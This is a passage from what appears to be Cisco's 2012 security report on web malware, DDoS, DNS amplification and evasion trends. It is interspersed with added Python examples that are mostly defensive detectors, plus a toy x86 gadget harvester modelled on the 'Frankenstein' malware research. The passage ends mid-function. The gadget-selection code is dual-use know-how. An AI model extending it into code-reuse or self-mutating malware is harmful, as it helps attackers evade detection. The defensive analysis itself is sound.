Malware creators constantly seek to maximize their return on investment (ROI) by finding ways to reach the largest population of potential victims with the least effort, and they often take advantage of cross-platform technologies when possible. Toward these ends, exploit toolkits generally deliver exploits in a specific order; once a successful exploit has been delivered, no further exploits are attempted. The high concentration of Java exploits, 87 percent of total web exploits, shows that these vulnerabilities are attempted prior to other types of exploits and also demonstrates that attackers are finding success with Java exploits. Additionally, with over 3 billion devices running Java,[16] the technology represents a clear way for hackers to scale their attacks across multiple platforms.

Two other cross-platform technologies, PDF and Flash, took the second and third spots in Cisco's analysis of the top content types for malware distribution. Though ActiveX is still being exploited, Cisco researchers have seen a consistently low use of the technology as a vehicle for malware. However, as noted earlier regarding Java, lower numbers of certain types of exploits are largely a reflection of the order in which exploits are attempted.

Figure 6: Top Malware Content Types for 2012. Java exploits comprised 87 percent of total web exploits. (Three panels: "Monthly Major Content Types", a Jan to Dec chart on a 0-100% scale; "Total Major Content Types"; and "Exploit Content Types" for Java, PDF, Flash and ActiveX, of which only the Java share, 87 percent, is recoverable from the transcript.)

  Total major content types:
    Application   65.05%
    Text          33.81%
    Image          1.09%
    Video          0.05%
    Audio          0.01%
    Message        0.00%
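The measurement point made above, that a kit stops at the first exploit that works and so under-counts everything later in its chain, can be shown with a small simulation. The code is an added example with a constructed victim population; the per-plugin vulnerability rates and the attempt order are assumptions, not Cisco measurements or any particular kit's logic. The closed form it checks against is share_i = p_i multiplied by the product of (1 - p_j) over the plugins j tried before i.

```python
"""Why 'share of exploits by content type' reflects a kit's attempt order:
an exploit kit tries Java, then PDF, then Flash, then ActiveX and stops at the
first success.  Added example; rates and population are constructed assumptions."""
import random
from collections import Counter

# Assumed probability that a visitor is exploitable through each plugin.
RATES = {"Java": 0.6, "PDF": 0.4, "Flash": 0.5, "ActiveX": 0.2}
# Assumed attempt order; a different kit could order these differently.
KIT_ORDER = ["Java", "PDF", "Flash", "ActiveX"]


def expected_shares(rates, order=KIT_ORDER):
    """Closed form: P(the kit records exploit i) = p_i * prod_{j before i} (1 - p_j)."""
    shares, survive = {}, 1.0
    for plugin in order:
        shares[plugin] = rates[plugin] * survive   # reached this stage and exploitable here
        survive *= 1.0 - rates[plugin]             # not exploitable here, move to the next
    shares["none"] = survive                       # survived the whole chain
    return shares


def simulate(rates, order=KIT_ORDER, n_victims=10_000, seed=1):
    """Draw each victim's vulnerable plugins independently and record what the kit would log."""
    rng = random.Random(seed)
    observed = Counter()
    for _ in range(n_victims):
        vulnerable = {p for p in order if rng.random() < rates[p]}
        for plugin in order:
            if plugin in vulnerable:
                observed[plugin] += 1   # first success ends the chain
                break
        else:
            observed["none"] += 1
    return observed


def exploit_share(observed, plugin):
    """Share of *successful* exploits attributed to one content type: the statistic a report plots."""
    total = sum(v for k, v in observed.items() if k != "none")
    return observed[plugin] / total if total else 0.0


if __name__ == "__main__":
    print("expected:", {k: round(v, 3) for k, v in expected_shares(RATES).items()})
    obs = simulate(RATES)
    for p in KIT_ORDER:
        print(f"{p:8s} exploitable={RATES[p]:.0%}  share of recorded exploits={exploit_share(obs, p):.1%}")
    flash_first = simulate(RATES, order=["Flash", "Java", "PDF", "ActiveX"])
    print("Flash share if tried first:", f"{exploit_share(flash_first, 'Flash'):.1%}")
```

With these assumed rates, Flash is exploitable on half the population but ends up with roughly 13 percent of recorded exploits because Java and PDF are tried first; move Flash to the front of the chain and its share exceeds 50 percent with no change in the population at all.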

In examining media content, Cisco data reveals almost twice as much image-based malware as non-Flash video. However, this is due, in part, to the way browsers handle declared content types, and to attackers' efforts to manipulate these controls by declaring erroneous content types. In addition, malware command-and-control systems often distribute server information via comments hidden in ordinary image files.
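Both tricks mentioned above, a declared Content-Type that lies about the bytes and C2 details tucked into an image's comment fields, are checkable on a proxy or in a sandbox. The module below is an added example (not Cisco's code) that sniffs a response body's real type from its magic bytes, compares it with the declared header, and extracts JPEG COM segments and PNG tEXt chunks. The sample responses, including the "image/gif" that is really a PE header and the C2 strings, are constructed inline; the addresses are documentation-range addresses, not real infrastructure.

```python
"""Detect Content-Type / magic-byte mismatches and pull hidden text out of
image metadata.  Added example; all sample bytes are constructed here."""
import struct
import zlib

MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"MZ": "application/x-msdownload",
    b"%PDF": "application/pdf",
}


def sniff(data: bytes) -> str:
    """Type according to the leading bytes, ignoring whatever the server claimed."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return "application/octet-stream"


def content_type_mismatch(declared: str, data: bytes):
    """(True, actual) when the Content-Type header disagrees with the bytes."""
    actual = sniff(data)
    return declared.split(";")[0].strip().lower() != actual, actual


def jpeg_comments(data: bytes):
    """Payload of every COM (0xFFFE) segment before the scan data starts."""
    out, i = [], 2                       # skip SOI
    while i + 4 <= len(data) and data[i] == 0xFF:
        marker = data[i + 1]
        if marker in (0xDA, 0xD9):       # SOS / EOI: no more header segments
            break
        seglen = struct.unpack(">H", data[i + 2:i + 4])[0]
        if marker == 0xFE:
            out.append(data[i + 4:i + 2 + seglen].decode("latin-1"))
        i += 2 + seglen
    return out


def png_text_chunks(data: bytes):
    """(keyword, text) for each tEXt chunk; every chunk's CRC is verified on the way."""
    out, i = [], 8                       # skip signature
    while i + 12 <= len(data):
        length = struct.unpack(">I", data[i:i + 4])[0]
        ctype = data[i + 4:i + 8]
        body = data[i + 8:i + 8 + length]
        crc = struct.unpack(">I", data[i + 8 + length:i + 12 + length])[0]
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        if ctype == b"tEXt":
            key, _, text = body.partition(b"\x00")
            out.append((key.decode("latin-1"), text.decode("latin-1")))
        if ctype == b"IEND":
            break
        i += 12 + length
    return out


def audit(declared: str, data: bytes) -> dict:
    """One verdict per response: real type, whether the header lied, any hidden text."""
    mismatch, actual = content_type_mismatch(declared, data)
    hidden = []
    if actual == "image/jpeg":
        hidden = jpeg_comments(data)
    elif actual == "image/png":
        hidden = [f"{k}: {v}" for k, v in png_text_chunks(data)]
    return {"declared": declared, "actual": actual, "mismatch": mismatch, "hidden_text": hidden}


# --- constructed sample responses --------------------------------------------
def _jpeg_with_comment(comment: bytes) -> bytes:
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + com + b"\xff\xda\x00\x02" + b"\xff\xd9"


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def _png_with_text(key: bytes, text: bytes) -> bytes:
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)       # 1x1 greyscale
    return (b"\x89PNG\r\n\x1a\n" + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"tEXt", key + b"\x00" + text)
            + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _png_chunk(b"IEND", b""))


SAMPLE_JPEG = _jpeg_with_comment(b"c2=http://198.51.100.7:8080/gate.php")   # constructed C2 string
SAMPLE_PNG = _png_with_text(b"Comment", b"srv=203.0.113.9")                  # constructed C2 string
SAMPLE_EXE_AS_GIF = b"MZ\x90\x00" + b"\x00" * 60                              # PE header served as a GIF

if __name__ == "__main__":
    for declared, body in [("image/gif", SAMPLE_EXE_AS_GIF), ("image/jpeg", SAMPLE_JPEG), ("image/png", SAMPLE_PNG)]:
        print(audit(declared, body))
```

Sniffing is deliberately done on the bytes alone, because a browser that sniffs will render or execute what the bytes are regardless of the header, which is exactly the behaviour the erroneous declarations are meant to exploit.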

Top Site Category

As Cisco data shows, the notion that malware infections most commonly result from "risky" sites such as counterfeit software is a misconception. Cisco's analysis indicates that the vast majority of web malware encounters actually occur via legitimate browsing of mainstream websites. In other words, the majority of encounters happen in the places that online users visit the most and think are safe.

Holding the second spot on the list are online advertisements, comprising 16 percent of total web malware encounters. Syndicated advertising is a common means of monetizing websites, so a single malicious ad distributed in this manner can have a dramatic, adverse impact.

Figure 7: Top Site Category. Online shopping sites are 21 times more likely to deliver malicious content than counterfeit software sites.

Note: The Dynamic Content category is at the top of Cisco's list of top locations for the likelihood of malware infections. This category includes content-delivery systems such as web statistics, site analytics, and other non-advertising-related third-party content.

  Dynamic Content & CDN       18.30%
  Advertisements              16.81%
  Business & Industry          8.15%
  Games                        6.51%
  Web Hosting                  4.98%
  Search Engines & Portals     4.53%
  Computers & Internet         3.57%
  Shopping                     3.57%
  Travel                       3.00%
  Online Communities           2.66%
  Entertainment                2.57%
  Online Storage & Backup      2.27%
  News                         2.18%
  Sports & Recreations         2.10%
  File Transfer Services       1.50%
  SaaS & B2B                   1.40%
  Web-Based Email              1.37%
  Education                    1.17%
  Transportation               1.11%
  Health & Nutrition           0.97%

Looking further down the list of site categories through which malware encounters occurred, business and industry sites, which include everything from corporate sites to human resources to freight services, are in third place. Online gaming is in fourth place, followed by web hosting sites and search engines in fifth and sixth places, respectively. The top 20 website categories are absent of sites typically thought of as malicious. There is a healthy mix of popular and legitimate site types such as online shopping (#8), news (#13), and SaaS/business-to-business applications (#16).

Cybercriminals have paid close attention to modern browsing habits in order to expose the largest possible population to malware. Where the online users are, malware creators will follow, taking advantage of trusted websites through direct compromise or third-party distribution networks.

Popular Applications by Hits

Changes in how people spend their time online are expanding the surface for cybercriminals to launch exploits. Organizations of all sizes are embracing social media and online video; most major brands have a presence on Facebook and Twitter, and many are integrating social media into their actual products. As these web destinations draw massive audiences and are accepted into enterprise settings, more opportunities to deliver malware are also created.

According to data from Cisco Application Visibility and Control (AVC), the vast majority (91 percent) of web requests were split among search engines (36 percent), online video sites (22 percent), advertising networks (13 percent), and social networks (20 percent).

If the data on the top websites visited across the Internet is correlated with the most dangerous categories of website, the very same places where online users have the most exposure to malware, such as search engines, are among the top areas that drive web malware encounters. This correlation shows once again that malware creators are focused on maximizing their ROI and therefore will center their efforts on the places where the number of users and ease of exposure are greatest.

Figure 8: Popular Applications by Hits. Social media and online video change how employees spend their time at work and expose new vulnerabilities.

  Search Engine    36%
  Online Video     22%
  Social Network   20%
  Ads              13%
  Other             9%

When Gothic Horror Gives Birth to Malware
by Kevin W. Hamlen, Associate Professor, Computer Science Department, The University of Texas at Dallas

Malware camouflage is an emerging threat that security professionals may increasingly face. While most malware already uses simple mutation or obfuscation to diversify and make itself harder to reverse-engineer, self-camouflaging malware is even stealthier, blending in with the specific software already present on each system it infects. This can elude defenses that look for software anomalies like runtime unpacking or encrypted code, which often expose more conventional malware.

The latest self-camouflaging malware technology, appropriately dubbed Frankenstein,[17] is a product of our research this year in the Cyber Security Research and Education Center at The University of Texas at Dallas. Like the fictional mad scientist in Mary Shelley's 1818 horror novel, Frankenstein malware creates mutants by stealing "body parts" (i.e., code) from other software it encounters and stitches the code together to create unique variants of itself. Each Frankenstein mutant is therefore composed entirely of non-anomalous, benign-looking software; performs no suspicious runtime unpacking or encryption; and has access to an ever-expanding pool of code transformations learned from the many programs it encounters.

Under the hood, Frankenstein brings its creations to life using an array of techniques drawn from compiler theory and program analysis. Victim binaries are first scanned for short byte sequences that decode to potentially useful instruction sequences, called gadgets. A small abstract interpreter next infers the possible semantic effects of each gadget discovered. Backtracking search is then applied to discover gadget sequences that, when executed in order, have the effect of implementing the malware payload's malicious behavior. Each such discovered sequence is finally assembled to form a fresh mutant. In practice, Frankenstein discovers over 2,000 gadgets per second, accumulating over 100,000 from just two or three victim binaries in under five seconds. With such a large gadget pool at their disposal, the resulting mutants rarely share any common instruction sequences; each therefore looks unique.

In general, our research suggests that next-generation malware may increasingly eschew simple mutations based on encryption and packing in favor of advanced metamorphic binary obfuscations like those used by Frankenstein. Such obfuscations are feasible to implement, support rapid propagation, and are effective for concealing malware from the static analysis phases of most malware detection engines. To counter this trend, defenders will need to deploy some of the same technologies used to develop Frankenstein, including static analyses based on semantic, rather than syntactic, feature extraction, and semantic signatures derived from machine learning[18] rather than purely manual analysis.

This article reports research supported in part by National Science Foundation (NSF) award #1054629 and U.S. Air Force Office of Scientific Research (AFOSR) award FA9550-10-1-0088. Any opinions, findings, conclusions, or recommendations expressed are those of the author and do not necessarily reflect those of the NSF or AFOSR.

17 Vishwath Mohan and Kevin W. Hamlen. "Frankenstein: Stitching Malware from Benign Binaries." In Proceedings of the USENIX Workshop on Offensive Technologies (WOOT), pp. 77-84, August 2012.

18 Mohammad M. Masud, Tahseen M. Al-Khateeb, Kevin W. Hamlen, Jing Gao, Latifur Khan, Jiawei Han, and Bhavani Thuraisingham. "Cloud-based Malware Detection for Evolving Data Streams." ACM Transactions on Management Information Systems (TMIS), 2(3), October 2011.
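As a concrete illustration of the first two steps described in the article above, harvesting gadgets from a victim binary and inferring what each one does, the script below is an added example and is not the Frankenstein code or anything from the cited papers. It decodes only a handful of one-byte 32-bit x86 opcodes (an assumption that keeps the decoder tiny; a real implementation would use a full disassembler), collects every decodable byte suffix that ends in ret, and runs a minimal abstract interpreter that reports which registers a gadget writes and its net stack effect, so gadgets can be selected by effect rather than by bytes. The "victim" byte string is constructed.

```python
"""Toy gadget harvester and effect summariser in the spirit of Frankenstein's
first two steps.  Added example: tiny one-byte x86 decoder (assumption), and
a constructed victim byte string."""

# One-byte x86 opcodes the toy decoder understands; everything else is "unknown".
ONE_BYTE = {0x90: "nop", 0xC3: "ret", 0xF8: "clc", 0xF9: "stc", 0xCC: "int3"}
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Constructed victim bytes: push ebp; mov ebp,esp; pop eax; ret; nop; pop ebx; pop edx; ret;
# call rel32 (E8 00 00 00 00); inc ecx; xchg eax,ecx; ret
SAMPLE_CODE = bytes([0x55, 0x89, 0xE5, 0x58, 0xC3, 0x90, 0x5B, 0x5A, 0xC3,
                     0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x91, 0xC3])


def decode_one(b: int):
    """Mnemonic for a single-byte instruction, or None if outside the supported subset."""
    if b in ONE_BYTE:
        return ONE_BYTE[b]
    if 0x50 <= b <= 0x57:
        return f"push {REGS[b - 0x50]}"
    if 0x58 <= b <= 0x5F:
        return f"pop {REGS[b - 0x58]}"
    if 0x40 <= b <= 0x47:
        return f"inc {REGS[b - 0x40]}"
    if 0x48 <= b <= 0x4F:
        return f"dec {REGS[b - 0x48]}"
    if 0x91 <= b <= 0x97:
        return f"xchg eax, {REGS[b - 0x90]}"
    return None


def find_gadgets(code: bytes, max_len: int = 4) -> dict:
    """Map 'insn ; insn ; ret' -> offset for every decodable suffix of up to max_len bytes before a ret."""
    gadgets = {}
    for end, byte in enumerate(code):
        if byte != 0xC3:
            continue
        for start in range(end, max(end - max_len, 0) - 1, -1):
            if start != end and code[start] == 0xC3:
                break                      # an earlier ret would leave before reaching ours
            insns = [decode_one(x) for x in code[start:end + 1]]
            if None in insns:
                break                      # undecodable byte: no longer suffix can be valid either
            gadgets.setdefault(" ; ".join(insns), start)
    return gadgets


def effect(gadget: str):
    """Tiny abstract interpreter: (registers written, net stack-pointer change in bytes)."""
    writes, delta = set(), 0
    for insn in gadget.split(" ; "):
        op, _, args = insn.partition(" ")
        regs = [r.strip() for r in args.split(",")] if args else []
        if op == "pop":
            writes.add(regs[0]); delta += 4
        elif op == "push":
            delta -= 4
        elif op in ("inc", "dec"):
            writes.add(regs[0])
        elif op == "xchg":
            writes.update(regs)
        elif op == "ret":
            delta += 4
    return writes, delta


def select_gadgets(gadgets: dict, reg: str):
    """Gadgets whose only side effect on registers is writing `reg` (e.g. a clean 'pop reg ; ret')."""
    return sorted(g for g in gadgets if effect(g)[0] == {reg})


if __name__ == "__main__":
    found = find_gadgets(SAMPLE_CODE)
    for g, off in sorted(found.items(), key=lambda kv: kv[1]):
        print(f"+{off:02x}  {g:40s} writes={sorted(effect(g)[0])} sp{effect(g)[1]:+d}")
    print("loads eax from stack:", select_gadgets(found, "eax"))
```

Selecting by effect is the point: two victims will rarely contain the same bytes, but both are likely to contain some gadget that leaves a chosen register loaded from the stack, and a mutant built from effects rather than bytes shares no byte signature with its siblings.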


2012 Vulnerability and Threat Analysis

The Vulnerability and Threat Categories chart shows a significant increase in threat totals in 2012; threats increased 19.8 percent over 2011. This sharp increase in threats is placing a serious strain on the ability of organizations to keep vulnerability management systems updated and patched, especially given the shift to virtual environments.

Organizations are also attempting to address the increasing use of third-party and open-source software included in their products and in their environments. "Just one vulnerability in third-party or open-source solutions can impact a broad range of systems across the environment, which makes it very difficult to identify and patch or update all those systems," says Jeff Shipley, Manager of Cisco Security Research and Operations.

As for the types of threats, the largest group is resource management threats; this generally includes denial of service vulnerabilities, input validation threats such as SQL injection and cross-site scripting errors, and buffer overflows that result in denial of service. The preponderance of similar threats from previous years, combined with the sharp increase in threats, indicates that the security industry needs to become better equipped at detecting and handling these vulnerabilities.

The Cisco IntelliShield Alert Urgency Ratings reflect the level of threat activity related to specific vulnerabilities. The substantial increase in Level 3 urgency ratings indicates that more vulnerabilities are actually being exploited. This is likely due to the increase in publicly released exploits, either by researchers or test tools, and the incorporation of those exploits into attack toolkits. These two factors are allowing more exploits to be available and used across the board by hackers and criminal groups.

The Cisco IntelliShield Alert Severity Ratings reflect the impact level of successful vulnerability exploits. The severity ratings also show a noticeable increase in Level 3 threats, for the same reasons indicated above relating to the ready availability of exploit tools.

Figure 10: Vulnerability and Threat Categories

Figure 9: Urgency and Severity Ratings

IntelliShield monthly alert numbers, 2010 to 2012 (columns as labelled in the figure: Total / Reamp / New / Cumulative):

Month       2012                      2011                      2010
January     552 / 344 / 208 / 552     403 / 237 / 166 / 403     417 / 259 / 158 / 417
February    551 / 317 / 234 / 1103    400 / 176 / 224 / 803     430 / 253 / 177 / 847
March       487 / 238 / 249 / 1590    501 / 276 / 225 / 1304    518 / 324 / 194 / 1364
April       524 / 306 / 218 / 2114    475 / 229 / 246 / 1779    375 / 167 / 208 / 1740
May         586 / 343 / 243 / 2700    404 / 185 / 219 / 2183    322 / 174 / 148 / 2062
June        647 / 389 / 258 / 3347    472 / 221 / 251 / 2655    534 / 294 / 240 / 2596
July        514 / 277 / 237 / 3861    453 / 213 / 240 / 3108    422 / 210 / 212 / 3018
August      591 / 306 / 285 / 4452    474 / 226 / 248 / 3582    541 / 286 / 255 / 3559
September   572 / 330 / 242 / 5024    441 / 234 / 207 / 4023    357 / 167 / 190 / 3916
October     517 / 280 / 237 / 5541    558 / 314 / 244 / 4581    418 / 191 / 227 / 4334
November    375 / 175 / 200 / 5916    357 / 195 / 162 / 4938    476 / 252 / 224 / 4810
December    376 / 183 / 193 / 6292    363 / 178 / 185 / 5301    400 / 203 / 197 / 5210
Year total  6292 / 3488 / 2804        5301 / 2684 / 2617        5210 / 2780 / 2430

[Charts: cumulative monthly alerts plotted January to December for 2010, 2011 and 2012 on a 0 to 8000 scale; counts of Severity 3, Severity 4, Severity 5 and Urgency 3, Urgency 4, Urgency 5 ratings for 2010 to 2012, on scales of 0 to 60 and 0 to 2000.]

"Just one vulnerability in third-party or open-source solutions can impact a broad range of systems across the environment, which makes it very difficult to identify and patch or update all those systems."

Jeff Shipley, Manager, Cisco Security Research and Operations


Evolutionary Threats

New Methods, Same Exploits

This is not to say that actors in the shadow economy do not remain committed to creating ever-more sophisticated tools and techniques to compromise users, infect networks, and steal sensitive data, among many other goals. In 2012, however, there was a trend toward reaching back to "oldies but goodies" to find new ways to create disruption or evade enterprise security protections.

DDoS attacks are a primary example: several major U.S. financial institutions were the high-profile targets of two major and related campaigns launched by foreign hacktivist groups in the last six months of 2012 (for detailed analysis, see the "2012 Distributed Denial of Service Trends" section). Some security experts warn that these events are just the beginning and that hacktivists, organized crime rings, and even nation states will be the perpetrators19 of these attacks in the future, working both collaboratively and independently.

"We are seeing a trend in DDoS, with attackers adding additional context about their target site to make the outage more significant," says Gavin Reid. "Instead of doing a SYN flood, the DDoS now attempts to manipulate a specific application in the organization, potentially causing a cascading set of damage if it fails."



While enterprises may believe they are adequately protected against the DDoS threat, more than likely their network could not defend against the type of high-volume and relentless DDoS attacks witnessed in 2012. "Even against a sophisticated (but average) adversary, the current state of the art in network security is often significantly outmatched," says Gregory Neal Akers, Senior Vice President for the Advanced Security Initiatives Group at Cisco.

Another trend in the cybercrime community revolves around the "democratization" of threats. "We are increasingly seeing that the tools and techniques, and intelligence about how to exploit vulnerabilities, are being broadly shared in the shadow economy today. Tradecraft capabilities have evolved a great deal," Akers says. "We're now seeing more specialization and more collaboration among malicious actors. It's a threat assembly line: Someone develops a bug, someone else writes the malware, another person designs the social engineering component, and so on."

Creating potent threats that will help them gain access to the large volumes of high-value assets coming across the network is one reason that cybercriminals are combining their expertise more often. But like any real-world organization that outsources tasks, efficiency and cost savings are among the primary drivers for the "build-a-threat" approach in the cybercrime community. The freelance talent hired for these tasks typically advertise their skills and pay rates to the broader cybercrime community via secret online marketplaces.


Amplification and Reflection Attacks

DNS amplification and reflection attacks21 utilize domain name system (DNS) open recursive resolvers or DNS authoritative servers to increase the volume of attack traffic sent to a victim. By spoofing22 DNS request messages, these attacks conceal the true source of the attack and send DNS queries that return DNS response messages 1,000 to 10,000 percent larger than the DNS request message. These types of attack profiles are commonly observed during DDoS23 attacks.

Organizations are inadvertently participating in these attacks by leaving open recursive resolvers out on the Internet. They can detect the attacks using various tools24 and flow telemetry25 technologies and can help prevent them by securing26 their DNS server or rate-limiting27 DNS response messages.
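The flow-telemetry check the paragraph refers to, as an added example that is not from the Cisco report: given exported flow records (NetFlow/IPFIX style, reduced to a handful of fields), it lists outside addresses that received answers from a resolver that should only serve local clients (a sign recursion is open) and flags those whose answer volume dwarfs the queries attributed to them, which is what a reflection victim looks like from the resolver's side. The resolver address, served prefix, thresholds and all traffic figures are constructed for illustration.

```python
"""Spot a resolver being abused as a DNS amplifier, from flow telemetry.

Added example (not from the Cisco report). Addresses, prefixes, thresholds
and traffic figures below are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
import ipaddress

# Constructed: the resolver we operate and the client networks it should serve.
RESOLVER_IP = "192.0.2.53"
SERVED_NETS = [ipaddress.ip_network("192.0.2.0/24")]


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str   # "udp" or "tcp"
    sport: int
    dport: int
    packets: int
    octets: int


def is_served(ip: str) -> bool:
    """True if ip belongs to a network the resolver is meant to answer."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SERVED_NETS)


def dns_stats_by_peer(flows):
    """Aggregate UDP/53 traffic between the resolver and each outside address.

    In a reflection attack the query source is spoofed, so the "peer" seen here
    is really the victim: small queries appear to come from it and large
    answers are sent back to it.
    """
    stats = defaultdict(lambda: {"req_octets": 0, "resp_octets": 0, "resp_packets": 0})
    for f in flows:
        if f.proto != "udp":
            continue
        if f.dst == RESOLVER_IP and f.dport == 53 and not is_served(f.src):
            stats[f.src]["req_octets"] += f.octets
        elif f.src == RESOLVER_IP and f.sport == 53 and not is_served(f.dst):
            stats[f.dst]["resp_octets"] += f.octets
            stats[f.dst]["resp_packets"] += f.packets
    return stats


def open_resolver_peers(flows):
    """Outside addresses that received answers: any entry means recursion is open."""
    return sorted(ip for ip, s in dns_stats_by_peer(flows).items() if s["resp_packets"] > 0)


def amplification_victims(flows, min_ratio=10.0, min_packets=100):
    """Map outside address -> response/request octet ratio where the traffic looks
    amplified: a large ratio (the report cites answers 1,000 to 10,000 percent
    larger than the query) and enough answer packets to matter. A stray outside
    client doing a few lookups does not trigger this."""
    victims = {}
    for ip, s in dns_stats_by_peer(flows).items():
        if s["req_octets"] == 0 or s["resp_packets"] < min_packets:
            continue
        ratio = s["resp_octets"] / s["req_octets"]
        if ratio >= min_ratio:
            victims[ip] = round(ratio, 1)
    return victims


# Constructed sample: one legitimate internal client, one stray outside client,
# and one outside address being hit with amplified answers (~3 KB each).
SAMPLE_FLOWS = [
    Flow("192.0.2.20", RESOLVER_IP, "udp", 51000, 53, 40, 2600),
    Flow(RESOLVER_IP, "192.0.2.20", "udp", 53, 51000, 40, 6400),
    Flow("203.0.113.5", RESOLVER_IP, "udp", 40000, 53, 10, 600),
    Flow(RESOLVER_IP, "203.0.113.5", "udp", 53, 40000, 10, 2000),
    Flow("198.51.100.10", RESOLVER_IP, "udp", 53, 53, 500, 30000),
    Flow(RESOLVER_IP, "198.51.100.10", "udp", 53, 53, 500, 1500000),
]

if __name__ == "__main__":
    print("open-resolver peers:", open_resolver_peers(SAMPLE_FLOWS))
    print("amplification victims:", amplification_victims(SAMPLE_FLOWS))
```

Any non-empty result from open_resolver_peers is itself the finding the paragraph warns about: the resolver answers queries it has no business answering, so restricting recursion to served networks removes the amplifier regardless of whether an attack is currently in progress; the ratio check is what tells an operator which remote address is being hit right now and where response rate limiting would bite.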

2012 Distributed Denial of Service Trends

The following analysis is derived from the Arbor Networks ATLAS repository, which consists of global data gathered from a number of sources, including more than 240 IPSs, monitoring peak traffic of 37.8 Tbps.28

Attack Sizes Continue to Trend Upward

Overall, there has been an increase in the average size of attacks over the past year. There was a 27 percent increase in throughput of attacks (1.23 Gbps in 2011 to 1.57 Gbps in 2012) and a 15 percent increase in the packets per second used in attacks (1.33 Mpps in 2011 to 1.54 Mpps in 2012).

Attack Demographics

The top three monitored attack sources, after removing 41 percent of sources for which there is no attribution due to data anonymization, are China (17.8 percent), South Korea (12.7 percent), and the United States (8.0 percent).

Largest Attacks

The largest monitored attack was measured at 100.84 Gbps and lasted approximately 20 minutes (source of attack is unknown due to data anonymization). The corresponding largest monitored attack in packets per second (pps) was measured at 82.36 Mpps and lasted approximately 24 minutes (source of attack is unknown due to data anonymization).


Weaponization of Modern Evasion Techniques

Cybercriminals are constantly evolving new techniques to bypass security devices. Cisco researchers watch vigilantly for new techniques and the weaponization of well-known techniques.

Cisco Security Research and Operations runs several malware labs to observe malicious traffic in the wild. Malware is intentionally released in the lab to ensure security devices are effective; computers are also left intentionally vulnerable and exposed to the Internet.

During one such test, Cisco Intrusion Prevention System (IPS) technology detected a well-known Microsoft Remote Procedure Call (MSRPC) attack. Careful analysis determined that the attack was utilizing a previously unseen malware evasion tactic in an attempt to bypass security devices.20 The evasion sent several bind context IDs inside the initial bind request. This type of attack can evade protections unless the IPS monitors and determines which of the IDs were successful.
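The bookkeeping the last sentence asks of an IPS, as an added example that is not Cisco's IPS code: a DCE/RPC bind may advertise several presentation contexts, and the bind_ack carries one result per context in the same order, so only the context the server marked as accepted (result 0) is live for later requests. An inspection engine that keys its signatures to the first advertised context, or to all of them, is what the multi-context evasion slips past. The PDU layout follows the DCE/RPC connection-oriented protocol (MS-RPCE); the interface UUID, context IDs and the bind/bind_ack pair are constructed samples.

```python
"""Track which DCE/RPC bind context the server actually accepted.

Added example, not Cisco's IPS code. Builds a constructed bind/bind_ack pair
(DCE/RPC connection-oriented PDUs, little-endian) and shows the matching an
inspection engine must do before treating a context id as live.
"""
import struct
import uuid

PTYPE_BIND, PTYPE_BIND_ACK = 11, 12
HEADER = "<BBBBIHHI"   # version, minor, ptype, flags, drep, frag_len, auth_len, call_id
NDR32 = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")   # standard NDR transfer syntax
ACCEPTANCE = 0         # p_cont_def_result_t: 0 = acceptance, 2 = provider rejection


def _pdu(ptype, body, call_id):
    # flags 0x03 = first and last fragment; drep 0x10 = little-endian integers
    return struct.pack(HEADER, 5, 0, ptype, 0x03, 0x10, 16 + len(body), 0, call_id) + body


def build_bind(contexts, call_id=1):
    """contexts: list of (context_id, abstract_syntax_uuid). Constructed sample builder."""
    body = struct.pack("<HHIB3x", 4280, 4280, 0, len(contexts))
    for ctx_id, iface in contexts:
        body += struct.pack("<HBx", ctx_id, 1)             # id, one transfer syntax
        body += iface.bytes_le + struct.pack("<I", 1)      # abstract syntax, version 1.0
        body += NDR32.bytes_le + struct.pack("<I", 2)      # transfer syntax, version 2.0
    return _pdu(PTYPE_BIND, body, call_id)


def build_bind_ack(results, call_id=1, sec_addr=b"135\x00"):
    """results: one p_cont_def_result per context, in bind order. Constructed sample builder."""
    body = struct.pack("<HHIH", 4280, 4280, 0x1234, len(sec_addr)) + sec_addr
    body += b"\x00" * (-(16 + len(body)) % 4)             # pad to a 4-byte boundary
    body += struct.pack("<B3x", len(results))
    for res in results:
        body += struct.pack("<HH", res, 0)
        body += (NDR32.bytes_le + struct.pack("<I", 2)) if res == ACCEPTANCE else bytes(20)
    return _pdu(PTYPE_BIND_ACK, body, call_id)


def parse_bind_context_ids(pdu):
    """Return the presentation context ids advertised in a bind PDU, in order."""
    _, _, ptype, _, _, frag_len, _, _ = struct.unpack_from(HEADER, pdu, 0)
    if ptype != PTYPE_BIND or frag_len != len(pdu):
        raise ValueError("not a complete bind PDU")
    n_ctx = pdu[24]
    off, ids = 28, []
    for _ in range(n_ctx):
        ctx_id, n_xfer = struct.unpack_from("<HB", pdu, off)
        ids.append(ctx_id)
        off += 4 + 20 + 20 * n_xfer        # ctx header, abstract syntax, transfer syntaxes
    return ids


def parse_bind_ack_results(pdu):
    """Return the per-context result codes from a bind_ack PDU, in bind order."""
    _, _, ptype, _, _, frag_len, _, _ = struct.unpack_from(HEADER, pdu, 0)
    if ptype != PTYPE_BIND_ACK or frag_len != len(pdu):
        raise ValueError("not a complete bind_ack PDU")
    sec_len = struct.unpack_from("<H", pdu, 24)[0]
    off = 26 + sec_len
    off += -off % 4                         # secondary address is padded to 4 bytes
    n_results = pdu[off]
    off += 4
    results = []
    for _ in range(n_results):
        results.append(struct.unpack_from("<H", pdu, off)[0])
        off += 24                           # result, reason, transfer syntax (20)
    return results


def accepted_context_ids(bind_pdu, ack_pdu):
    """Context ids a request may legitimately carry after this bind exchange."""
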